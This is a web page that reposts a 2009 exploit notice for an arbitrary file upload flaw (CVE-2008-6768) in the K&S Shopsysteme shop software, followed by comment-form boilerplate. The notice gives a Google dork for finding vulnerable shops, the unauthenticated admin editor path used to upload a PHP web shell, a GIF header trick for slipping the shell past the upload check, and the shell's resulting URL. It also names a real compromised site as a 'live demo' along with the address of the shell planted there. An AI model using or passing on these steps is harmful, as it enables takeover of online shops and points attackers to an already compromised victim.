K&S Shopsysteme Arbitrary Remote File Upload Vulnerability

2009.05.02

Credit: mNt

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-6768

CWE: CWE-20

Ogólna skala CVSS: 6.8/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 8.6/10

Wymagany dostęp: Zdalny

Złożoność ataku: Średnia

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

## Script Name: Shopsysteme (new version oscommerce)

## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 

## Author: mNt

## File Upload Bug

## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme iin yaklak 32.900 sonutan 191 - 200 aras sonuar (0,51 saniye)]

## Use:

http://www.example.com/

after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php

File uploaded php shell

after in url: http://www.example.com/images/upload/mNt.php

Attention: Shell Code  GIF89;a

## Live demo: http://www.trampleandfetish.de/admin/editor/image.php

## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php

## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

K&S Shopsysteme Arbitrary Remote File Upload Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.